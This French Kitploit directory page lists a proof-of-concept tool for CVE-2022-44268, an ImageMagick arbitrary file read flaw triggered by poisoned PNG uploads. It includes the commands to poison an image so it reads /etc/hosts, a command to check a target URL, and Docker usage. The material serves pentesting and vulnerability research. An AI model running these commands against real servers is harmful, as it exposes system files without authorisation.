Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-44268 — Preuve de concept pour CVE-2022-44268 permettant la lecture arbitraire de fichiers via des images PNG empoisonnées téléversées sur des instances ImageMagick vulnérables. Inclut la prise en charge de Docker et l'extraction basée sur des URL. | Kitploit
Outils/GitHubGitHub/kljunowsky/cve-2022-44268
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubkljunowsky/cve-2022-44268

CVE-2022-44268

Preuve de concept pour CVE-2022-44268 permettant la lecture arbitraire de fichiers via des images PNG empoisonnées téléversées sur des instances ImageMagick vulnérables. Inclut la prise en charge de Docker et l'extraction basée sur des URL.

Voir le dépôt
2782il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick Lecture de fichier arbitraire - Preuve de concept d'exploit

Vidéo 📼

https://youtu.be/quKxwNAMBIA

Utilisation 🛠

Empoisonner l'image ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Télécharger l'image PNG empoisonnée.

Vérifier si l'exploit a réussi 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Exécution avec Docker 🐳

Construction

root@kitploit:~
docker build -t cve-2022-44268 .

Exécution

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Paramètres 🧰

ParamètreDescriptionType
--urlL'URL de l'image PNG téléchargéeChaîne
--imageFichier PNG d'entréeFichier
--outputFichier PNG de sortieFichier
--file-to-readFichier à lire depuis l'hôte vulnérableChaîne

Contactez-moi📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

À des fins éducatives uniquement et ne peut être utilisé pour enfreindre la loi ou à des fins personnelles.

L'auteur de ce projet n'est pas responsable des éventuels dommages causés par les matériaux de ce projet.

Plus de détails : https://www.metabaseq.com/imagemagick-zero-days/

Télécharger l’outil